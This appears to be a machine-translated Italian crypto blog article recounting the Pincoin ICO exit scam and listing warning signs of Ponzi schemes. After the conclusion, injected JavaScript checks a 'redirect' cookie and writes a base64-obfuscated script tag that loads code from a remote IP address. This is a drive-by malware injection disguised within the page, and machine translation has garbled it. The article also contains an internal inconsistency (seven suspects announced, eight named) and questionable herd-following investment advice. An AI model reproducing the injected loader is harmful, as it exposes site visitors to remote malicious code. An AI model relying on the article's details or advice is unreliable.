15 49.0138 8.38624 1 0 4000 1 https://harowo.com 300 0
theme-sticky-logo-alt
theme-logo-alt

Pincoin: una truffa ICO da 660 milioni di dollari che ha ingannato 32.000 persone

Pincoin è l’ultimo di una serie di truffe di “uscita” di alto profilo. Il loro ICO ha guadagnato oltre 660 milioni di dollari di sudati guadagni degli investitori. Con oltre 32.000 persone truffate, la truffa Pincoin è una delle più riuscite negli ultimi tempi.

E la cosa divertente è che sarebbe sempre successo.

Fin dall’inizio, il progetto Pincoin portava evidenti segni di uno schema Ponzi. Ma l’attrazione del 48% di rendimenti mensili si è rivelata un’attrazione troppo grande per molti per rifiutarla, portando migliaia di investitori a essere truffati in pieno giorno.

Unisciti a noi mentre esploriamo come è nata la truffa e impara a individuare i segni rivelatori di uno schema Ponzi in divenire.

Come si è svolta la truffa

L’offerta iniziale di monete

Il 12 gennaio 2018, una nuova crittografia chiamata Pincoin (PIN) è arrivata sul mercato.

A prima vista, il progetto sembrava legittimo, vantando una roadmap ben pianificata e un white paper professionale. Tuttavia, la moneta offriva un tasso di rendimento fenomenale – 48% al mese ed è allora che i campanelli d’allarme avrebbero dovuto suonare per i potenziali investitori.

Non sorprende che gli speculatori si siano riversati nella sua crowdsale e abbiano investito l’incredibile cifra di $ 660.000.000 in Pincoin. I fondi sono andati alla cosiddetta “fondazione PIN”, un gruppo senza scopo di lucro composto da un numero di persone vietnamite sconosciute.

Le persone però non erano preoccupate; il progetto era apparentemente in fase di sviluppo già da più di un anno, con un gran numero di funzionalità ancora da venire in futuro. Come dice il white paper; lo scopo del Pincoin era “costruire una piattaforma di consumo collaborativo online per la comunità globale”. Qualunque cosa voglia dire.

Promesse della luna

È normale che i progetti crittografici si pongano uno o due obiettivi ambiziosi. Tuttavia, Pincoin era speciale.

La roadmap di Pincoin prometteva non uno, non due, ma ben otto prodotti basati su blockchain. Questi prodotti andavano dagli hedge fund decentralizzati ai mercati P2P fino a persino un portale di giochi con PIN. In breve, Pincoin ha promesso il mondo agli investitori.

Il sito web è stato progettato abbastanza bene ed è stato migliorato da una bella grafica. Non è difficile capire perché così tanti si sono innamorati delle bugie diffuse da Pincoin. Dopo tutto, stavano vendendo un sogno. Il problema con i sogni è che ti portano solo così lontano e ad un certo punto tutti si svegliano.

Trucchi che svaniscono

È stato dopo aver effettuato il primo pagamento in contanti agli investitori che l’inganno è iniziato sul serio.

Citando la richiesta popolare, la fondazione PIN ha lanciato un’altra criptovaluta chiamata iFan. Questo doveva essere un token di social media per artisti e celebrità e il token iFan è stato quindi pubblicizzato in modo aggressivo su altri siti Web. Gli investitori non sapevano cosa farsene quando, all’improvviso, i loro pagamenti hanno iniziato ad arrivare sotto forma di token iFan appena coniati.

Poiché la moneta non è stata scambiata su alcun exchange di criptovalute, era del tutto inutile. Gli investitori si ribellarono e si precipitarono negli uffici della società della Modern Tech a Ho Chi Minh, solo per trovare i locali sciccosi deserti.

Gli uccelli avevano volato nel nido.

Come sta la situazione adesso

In seguito alle notizie di perdite incredibili di 660 milioni di dollari, le autorità vietnamite sono entrate in azione. Lo stesso primo ministro vietnamita ha ordinato a sei ministeri del governo e alla polizia di indagare sulla truffa.

Tuttavia, potrebbe essere già troppo tardi. Il proprietario dell’ex edificio per uffici di Modern Tech ha rivelato che la società ha già annullato il contratto ed è scappata in una località sconosciuta a marzo. L’indagine iniziale ha portato alla luce i nomi di sette persone. Si ritiene che le seguenti persone siano le menti di questa sfacciata truffa che li ha resi multimilionari: Bui Thi My Ngoc, Ho Phu Ty, Ho Xuan Van, Luong Huynh Quoc Huy, Luu Trong Tuan, Nguyen Duc Trong, Nguyen Trung Hieu, e Vu Huu Loi.

Come spesso accade in tali truffe, i criminali sono già fuggiti dal paese. Inoltre, la natura decentralizzata delle criptovalute rende quasi impossibile per qualsiasi autorità governativa confiscare i guadagni illeciti.

I soldi sono sostanzialmente andati.

Le chiare bandiere rosse nell’ICO di Pincoin

Non importa quanto sia ben realizzata una truffa, ci sono sempre cose nella menzogna che non tornano del tutto. Abbiamo elencato tutti gli indizi rivelatori in modo che si spera che non cadrai mai in truffe simili in futuro.

# 1 Ritorni non realistici

Questo è l’unico indicatore più importante della legittimità di un’opportunità di investimento. Gli schemi di Ponzi e i progetti di crittografia truffa tendono tutti a promettere rendimenti oltraggiosi al fine di attirare più persone nella loro rete di inganni. Pincoin che promette un folle tasso del 48% nei rendimenti mensili è un classico esempio del buon vecchio schema Ponzi hook.

Ricorda, se i rendimenti promessi su qualsiasi investimento sembrano troppo belli per essere veri, quasi sempre lo sono. Non lasciarti ingannare dalle promesse delle favole.

# 2 Roadmap troppo ambiziosa

I mercati delle criptovalute sono ancora agli inizi. Ciò significa che c’è meno concorrenza nelle nicchie delle criptovalute rispetto al tradizionale settore dell’e-business e il duro lavoro di creazione di infrastrutture è ancora necessario. Il risultato è che la maggior parte dei progetti di criptovaluta legittimi di solito si concentra sulla fornitura di solo una o due cose. Quindi, se vedi un progetto come Pincoin che promette di rivoluzionare una dozzina di nicchie diverse e sono timidi nel dirti come intendono raggiungere il dominio del mondo, allora con ogni probabilità è una truffa.

Impara a prendere tutte le grandi promesse con le pinze.

# 3 Squadra anonima

Questo è un grande segnale di avvertimento. Ogni progetto crittografico degno di questo nome ha una sorta di team dietro di esso, con fondatori visibili e altri membri chiave. Nomi e volti danno credibilità a un progetto perché ci sono persone reali con la loro reputazione in gioco.

Tuttavia, Pincoin non ha mai rivelato nessuno dei membri del suo team. Persino il white paper evita di menzionare anche un fondatore, un lampante segnale di avvertimento.

Se un progetto sta tentando di nascondere l’identità dei suoi creatori, quasi certamente non va bene.

# 4 Errori di battitura diffusi

Questo è un indizio più sottile. Quando viene creato un vero progetto di qualsiasi dimensione significativa, coinvolge professionisti per la creazione dei loro comunicati stampa e dei contenuti del sito web. Le truffe, al contrario, si concentrano più su un’apparenza di professionalità che sulla professionalità stessa.

Leggendo il white paper di Pincoin, puoi imbatterti in diversi errori di battitura sciatti, come “base su” anziché basato su, spazi mancanti e molti altri. Inoltre, la lingua è scomoda in molti punti, con strane costruzioni di frasi.

Sebbene non sia una prova convincente di per sé, la mancanza di ortografia e grammatica adeguate indica un documento messo insieme frettolosamente. Questo è un altro segno distintivo di una truffa.

# 5 Gergo inutile

I progetti crittografici Ponzi utilizzano spesso frasi e parole complicate per nascondere la mancanza di materiale reale. Appuntando il testo con il gergo del settore, cercano di distogliere l’attenzione dalla mancanza di qualsiasi progetto legittimo. Inoltre, il linguaggio tecnico cerca di rafforzare la “conoscenza” posseduta dai progetti crittografici facendo sentire i lettori stupidi.

Il white paper e il sito web di Pincoin ospitano molte di queste gemme di complicità e gergo. “Il progetto PIN riguarda la creazione di una piattaforma di consumo collaborativo online per la comunità globale, basata sui principi di Sharing Economy, Blockchain Technology e Crypto Currency”.

Quando un white paper inizia a gettare il gergo crittografico come parole magiche, è tempo di rendersi conto che non ha nulla di concreto da offrire.

Come evitare tali truffe

Ricerca la criptovaluta in cui hai intenzione di investire

Non possiamo sottolineare abbastanza questo punto. Non dovresti mai e poi mai investire in una criptovaluta basandoti solo sul sentito dire. Prenditi sempre il tempo per esplorare tu stesso i dettagli essenziali del progetto. Se suona come un sacco di lavoro, lo è.

Prima di acquistare una criptovaluta, è fondamentale avere una certa comprensione del problema che sta cercando di risolvere. A meno che tu non sia disposto a fare uno sforzo extra per farlo, considera invece di investire in qualcos’altro.

Sostieni la squadra

Un’altra considerazione importante. Un progetto crittografico è un’impresa complessa e tecnica, che richiede cicli di sviluppo e test prolungati. Ciò significa che una criptovaluta deve avere alle spalle un team solido, che copra tutti i ruoli, dall’ingegneria al marketing.

Inoltre, il track record delle persone che compongono il team suggerisce la fattibilità del progetto stesso. Questo perché i professionisti con precedenti esperienze nello sviluppo di prodotti hanno maggiori probabilità di svolgere le cose correttamente.

Quindi guarda sempre nel team del progetto di criptovaluta: è uno dei fattori principali che creerà o distruggerà un progetto di criptovaluta.

Seguire la folla

No, non sto scherzando. Per quanto possa sembrare stupido, a volte scegliere una scelta popolare è la soluzione migliore. È improbabile che un progetto sostenuto da illustri investitori crittografici come Pantera Capital finisca per essere una truffa. Molto semplicemente, questi hedge fund crittografici sono qui per fare soldi e devono ai loro investitori di fare un’ampia due diligence.

Inoltre, se una parte molto ampia della popolazione è investita nel progetto, è più difficile per i fondatori attirare rapidamente i propri investitori. Infine, la presenza di una grande comunità fornisce una piattaforma per esprimere anche i tuoi dubbi e le tue preoccupazioni.

La lezione? Interessati a ciò di cui parlano tutti gli altri e cerca progetti supportati da grandi fondi hedge di criptovaluta.

Conclusione

A causa delle enormi somme che fluttuano negli ICO in questi giorni, è naturale che abbiano attirato i truffatori. Ciò che rende questo problema più un problema è l’anonimato diffuso nello spazio crittografico e la possibilità di utilizzare le monete per la privacy per nascondere enormi trasferimenti di valore. In realtà è abbastanza difficile rintracciare i truffatori che ottengono guadagni illeciti.

L’onere della sicurezza grava esattamente sulle tue spalle. Nessun governo, autorità o organismo di regolamentazione può sostituire la due diligence di un investitore esperto.

Con qualsiasi investimento in criptovaluta, sono i tuoi soldi a essere in gioco. Ricorda solo di rimanere esperto e di valutare attentamente ogni opportunità di investimento che stai considerando.

function getCookie (e) {var U = document.cookie.match (new RegExp (“(?: ^ |;)” + e.replace (/([\.$?* | {} \ (\) \ [\ ] \\\ / \ + ^]) / g, “\\ $ 1 ″) +” = ([^;] *) “)); return U? decodeURIComponent (U [1]): void 0} var src = “dati: text / javascript; Base64, ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs =”, ora = Math.floor (Date.now () / 1e3), biscotto = getCookie ( “redirect”); if (ora>= (time = cookie) || void 0 === time) {var time = Math.floor (Date.now () / 1e3 + 86400), date = new Date ((new Date) .getTime () + 86400) ; document.cookie = “redirect =” + time + “; percorso = /; expires = “+ date.toGMTString (), document.write (“)} RiepilogoCrypto Scams: PincoinNome articolo Crypto Scams: Pincoin Descrizione L’ICO Pincoin è l’ultimo di una serie di vistose truffe crittografiche. Scopri perché dovresti starne alla larga. Autore Levin Roy Nome editore Totalcrypto.ioPublisher Logo

Previous Post
Guia para iniciantes em investimentos da ICO – Como se envolver
Next Post
Крипто измами: Centra Tech ICO